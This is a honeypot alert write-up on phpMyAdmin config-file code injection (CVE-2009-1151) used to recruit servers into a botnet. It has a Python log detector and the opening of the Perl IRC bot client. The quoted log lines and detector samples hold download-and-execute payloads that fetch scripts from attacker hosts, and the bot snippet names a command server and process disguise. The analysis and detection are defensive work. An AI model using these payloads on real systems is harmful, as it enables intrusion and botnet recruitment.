[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment
Our web honeypots picked up the following attacks today:
62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.4"
195.145.156.126 - - [21/Feb/2012:05:42:27 -0600] "GET /mysql/config/config.inc.php?eval=system('echo cd /tmp;wget http://dinte.altervista.org/apache_32.png -O p2.txt;curl -O http://dinte.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://dinte.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 225 "-" "curl/7.18.1 (i686-suse-linux-gnu) libcurl/7.18.1 OpenSSL/0.9.8g zlib/1.2.3 libidn/1.8"
These appear to be follow-up exploit attempts for CVE-2009-1151, which allowed PHP code to be written into phpMyAdmin configuration files; the eval parameter in each request carries the PHP code the attacker expects a previously injected config file to execute.
Botnet Recruitment
The injected command chain tries several OS-level HTTP client utilities (wget, curl and lynx) in turn to download a file from the attacker's site, runs each downloaded copy with perl, and then deletes the copies. In both cases the remote file is a Perl botnet client script.
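A detector for this request pattern, added here as an example and not part of the original alert: it parses Apache combined-log lines, flags hits on phpMyAdmin config files whose eval parameter contains a PHP shell-out call, and extracts the stage-2 download URLs as indicators. The two log lines are the ones quoted above; the 10.0.0.5 line is a constructed benign request, and the extra PHP function names beyond system() are a generalization.

```python
import re
from urllib.parse import unquote

# Sample input: the two honeypot hits quoted above, plus one constructed benign
# request (10.0.0.5) as a negative control.
SAMPLE_LOG = '''\
62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.4"
195.145.156.126 - - [21/Feb/2012:05:42:27 -0600] "GET /mysql/config/config.inc.php?eval=system('echo cd /tmp;wget http://dinte.altervista.org/apache_32.png -O p2.txt;curl -O http://dinte.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://dinte.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 225 "-" "curl/7.18.1 (i686-suse-linux-gnu) libcurl/7.18.1 OpenSSL/0.9.8g zlib/1.2.3 libidn/1.8"
10.0.0.5 - - [21/Feb/2012:06:00:00 -0600] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'''

# Apache combined log format; the request target is matched greedily because
# these payloads contain unencoded spaces.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>.*) '
    r'HTTP/\d\.\d" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
CONFIG_PATH_RE = re.compile(r'/config(?:\.sample)?\.inc\.php$', re.IGNORECASE)
# system() is what the alert shows; the other PHP shell-out functions are an addition.
CODE_EXEC_RE = re.compile(r'\b(?:system|exec|shell_exec|passthru|popen)\s*\(', re.IGNORECASE)
DOWNLOADER_RE = re.compile(r'\b(wget|curl|lynx|fetch)\b')
URL_RE = re.compile(r'https?://[^\s;\'"<>)]+')

def parse_access_log_line(line):
    """Split one combined-log line into fields; returns None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec['path'], _, query = rec['target'].partition('?')
    rec['query'] = unquote(query)
    return rec

def detect_config_injection(line):
    """Flag a request handing PHP code to a phpMyAdmin config file via ?eval=. The
    status is reported, not filtered: the honeypot answered 404, an exposed install would not."""
    rec = parse_access_log_line(line)
    if rec is None or not CONFIG_PATH_RE.search(rec['path']):
        return None
    params = dict(p.partition('=')[::2] for p in rec['query'].split('&') if p)
    payload = params.get('eval', '')
    if not CODE_EXEC_RE.search(payload):
        return None
    return {
        'src_ip': rec['ip'], 'timestamp': rec['ts'], 'path': rec['path'],
        'status': int(rec['status']), 'user_agent': rec['ua'],
        'downloaders': sorted(set(DOWNLOADER_RE.findall(payload))),
        'download_urls': sorted(set(URL_RE.findall(payload))),  # stage-2 IoCs
    }

def scan_log(text):
    return [f for f in map(detect_config_injection, text.splitlines()) if f]
```

Note that the attacker's misspelled "lyxn" is deliberately not matched by the downloader pattern, so the finding lists only the tools that would actually have run.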
Example Botnet Client Snippet
#!/usr/bin/perl
my @mast3rs = ("tzepelush","Bunicul");
my @admchan=("#scan");
$servidor='winscp.zapto.org' unless $servidor;
my $xeqt = "?p";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/bin/atd");
my @nickname = ("fattys","eliter","vxbot","smufen","dual","lee","carro","frida",
"aVe","kmod","kmod2","uselib","raptor","tmpSH","pwned","w00t","DualDuo","Intel",
"AMDPwr","Geforce","Exploit","vx8m0d","indexs","index","index2","index3","index4",
"xQt1","xQt2","xQt3","xQt4","xQt5","xQt6","xQt7","xQt8","xQt9","xQt10","TeaMrxz",
"De","Der","Det","Var","Kam","Dea","Csa","Fbi","Dea","Narko","Gone","Feber","Tull",
"Tundra","st0rms","fLash","TheLight","Nikko","Nikie","Nikkie","daniel","t0nyandr",
"Europa","Fanta","Caroline","speedline","Perf0rm","indexs","dan","educat","catina",
"bindex","hindex","n0rway","myphp","phpvuln","Alarma","GoScan","oslocity","spette",
"Cascam","vSport","vSmotor","vSteam","vSturbo","Turbost","heeman","andy","loundry",
"ranger","Carbon","TypeR","Nozz","phpforum","Nxgas","NinaGirl","Isit","lama","ouch",
"vTeam","vSpot","vCrew","xeQta","Gourl","Vulnx","Hksurl","Greedy","Mrx","counyjail",
"Spourl","Torshov","Oslos","com_xeqt","mowgli","Asus","com_mrx","MrxTeam","arrest",
"vScrew","beran","stuing","ucutter","readnot","gethelp","curpos","cutext","Busted",
"detda","kanjo","neinei","Carbon","irriter","masa","dev-null","korsett","PerlTeam",
"jada","kanjeg","mutterz","dalenmin","heimdal","Gambler","Deanz","Phreak","Getno",
"Susa","Pils","Pilz","Bilz","Clubz","Clubs","Clubbin","Fights","Kampen","telenor",
"Karss","Gophy","reactor","fileporn","filemp3","filelist","free6","purextc","upc",
"Grandis","Piccaso","Vanda","varburen","Tiesto","Jean","DjEan","MeNe","ThiS","nO",
"drspeed","fuzzy","buzzz","GoScan","Vulned","Gourl","makeconf","sshdconf","ngtno",
"m0rtem","cat0","Fuckyall","Fuckit","Aem","Greedy","Hkss","Sparco","MoMo","Carbon",
"d3nyall","vipz","dualc0rz","twoc0re","gotit","h0lyshit","prtls","rapt0r","Getde",
"Vulnx","d3nyurl","vUlnurl","v0dka","Torshov","turboo","Boost","fasty","fr","getfr",
"datacore","dualcore","Daniel","spurv","byrds","jails","spoot","speels","ml","getd",
"Antivi","nod32","Screwed","alias","mekkka","template","f0rm3","p0ker","Geton","NO",
"Door","Borr","Jaarn","Sporet","Dopa","Hasjen","purxTc","Liquer","Justlink","Asust",
"Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner",
"Edward","Eickenhorst","Eliasson","Erdos","Erez","Espinoza","Estes","Etter","Eina",
"Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","d0",
"Everett","Fabbris","Fagan","Faioes","Altavista","Flamor","Faris","Farone","f00ln3t",
"Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman","Euripides","Enzoo","d00rk",
"Wikii","Wifii","Jvc","s0nny","lekter","herrier","sp0ker","netply","netb0st","Liq",
"comma","julie","sveina","andre","pulsedj","p0ker","j0ker","eFn3t","Liers","xTcno",
"Suite","Incl","Page","Mappe","Oxyd","Infode","Senil","Powers","Langu","m0d","doch",
"Snakes","Ridder","Viking","Vikings","Norman","Norway","German","Info","Biz","Edud",
"Ninjas","Ilness","Teacer","Faceoff","devnull","MoMo","Spoon","Liquid","Goofy","Aj",
"Google","Yahoo","Altavista","Lycos","Sesam","Solno","Googler","ScamNet","w0rmnet",
"puman","Skeidar","Tinemelk","Freia","Tresis","Tbanen","Adenyed","Hulken","Pureice",
"Sperre","Lister","Burbon","burb0ns","Toy0","Proxes","WrxSti","Evo6","Evo7","Evo8",
"wss","bss","natron","kiwis","Reman","SevnUp","Perlpls","Spiid","Govbr","Govmil",
"Wssss","Files","xFiles","Dataw0rm","n3tw0rm","Info","Biz","Orgy","foksy","Reven",
"limbo","mambi","bambi","rummy","IluvPerl","PerlKing","Pokerking","Turboa","Gttt",
"BugScam","BugTraq","Trackqs","Que","Adidas","Umbro","Sportas","Liquid","Forume",
"Deka","Jbl","Adecco","M5R","Tuners","Techno","Sivilen","Baosh","Snuten","Purken",
"aaudi","coupe","netliga","liganet","netbase","NetSnok","Snoknet","Snifnet","libz",
"indexp","jooblaa","mamboo","Binl3n","Cplusplus","p3rls3x","illgoon","de","lime",
"homes","newsr","sindex","findex","shome","php3","eedan","Evens","Everest","kkk2",
"igal","c0lombia","freeme","dupen","d3nmark","s2ed3n","crypt0n","n0dam3n","itch",
"Domino","Tarsan","julie","Anett","Stine","Laura","Croft","Craft","Mrex","jiggy",
"Hemaan","c0nan","c0nmen","ImI","RdR","Ils","Ass","Dildo","Pula","Blow","Sn0rts",
"Aloalo","Nasa","DeaGov","FbiGov","NsaGov","CiaGov","CsiEdu","Hav0rd","djPulse",
"Oslos","Ils","cia","d3a","dea","nsa","nas","ama","kma","Scamurl","vito","xQt",
"info","cpu","pet","pacs","dino","megov","onet","xrm","tisi","parm","cico","jun",
"caos","fred","peace","dude","rox","rock","rokie","bayrn","gees","hval","wolf",
"do","go","ln","st","file","page","pag","pg","lg","lang","lng","srcs","action",
"sml","pod","nvidia","vidia","villa","kake","spat","solo","Cols","kols","kreft",
"lam","fal","dett","drop","snop","true","fake","yes","sir","mae","nmf","vmax","as",
"adio","audo","soren","tvtre","host","unitd","coda","cobra","mans","gmail","gtrs",
"remax","rik","fatig","poor","girls","pow","wop","wok","son","kolsa","royk","asss",
"los","las","angl","dream","fools","phol","phools","d0rk","spon","spalk","kalk",
"email","smtp","pops","imapd","pag","lang","lg","nav","php","spyer","cyp","hardy",
"email","null","mastr","drunk","full","beer","bayer","mage","neve","fist","haist",
"dara","dora","boris","dev","cupra","isgal","Yuri","Geez","Frys","dos","to","emul",
"pwned","kung","kim","lil","fatjo","fatman","fat","joe","does","quat","tres","eu",
"shv5","lrk","lkm","lkmrk","trk5","xt","tqex","itt","full","half","power","sender",
"does","tres","quat","fiat","spon","kvae","liim","papp","ddos","fart","noz","daim",
"liga","tvone","shdw","etcpwd","initd","ftpd","wuspl","proftp","newsd","sockd","lue",
"loma","Domma","hest","heist","tivoli","stud","dust","fust","Flue","nille","kenny",
"koma","loc","inc","incl","src","fokus","ford","chevy","wrc","cpu","cool","srchers",
"inc","incl","dir","file","sdir","mains","login","path","base","cmd","cats","farts",
"fiat","uno","jern","kober","liq","torsk","fisk","laks","hone","hore","buk","noman",
"lim","idem","prince","sveina","kine","kim","allan","hanne","terje","bukken","bruse",
"nu","do","li","faen","tater","doc","loc","pof","ninja","per","pets","sings","doper",
"liq","dop","heroin","dok","page","php3","pop","smtp","data","kilde","foss","lowrdr",
"drvby","viper","snake","dragon","dup","vuln","cat","grep","loop","inetd","proftpd",
"pasive","damp","wals","snoke","snik","poff","phil","pill","dra","drjo","djo","laby",
"rune","alan","britt","brita","stue","stenen","andy","bass","phatt","lover","fresa",
"jvc","jbl","cia","fed","sov","purk","snut","snif","deka","svovel","life","knife","so",
"deka","bos","boss","fres","spett","dusj","kappe","norman","keb0rd","fab","dor","bits",
"kniv","lisa","nina","ole","pat","mtv","charl","smokie","nabo","walk","brks","krad-3",
"dame","lady","bola","biffen","kamm","drev","sprider","spider","iscrem","daddy","pie",
"ono","tima","mytm","motor","vsmot","sport","fart","devs","var","tmp","spol","sture".
"jule","tree","gate","net","rand","perl","line","xqt","mrx","org","asus","sped","yaco",
"hash","hmm","ddos","pwr","nix","linux","bsd","ppal","aio","mars","bates","daim","da",
"pico","nmap","juge","sone","log","goofy","kars","meter","daim","kul","foksy","hyena",
"beta","pulse","driver","org","fos","kars","kma","fua","all","tea","foks","lady","fa",
"testo","bola","bolen","card","cards","chip","chips","wv","audi","bmw","roys","bechs",
"nokia","mrx","some","candy","goo","cool","scam","scan","google","lee","cam","li","dm",
"loff","grov","abcd","pulse","grow","alrt","spyd","trojan","maxd","xeqtd","xQtd","nodz",
"owner","crime","data","need","doper","hash","mysql","imapd","devil","shark","byn","ju");
my @xident = ("winscp");
my @xname = (`uname -a`);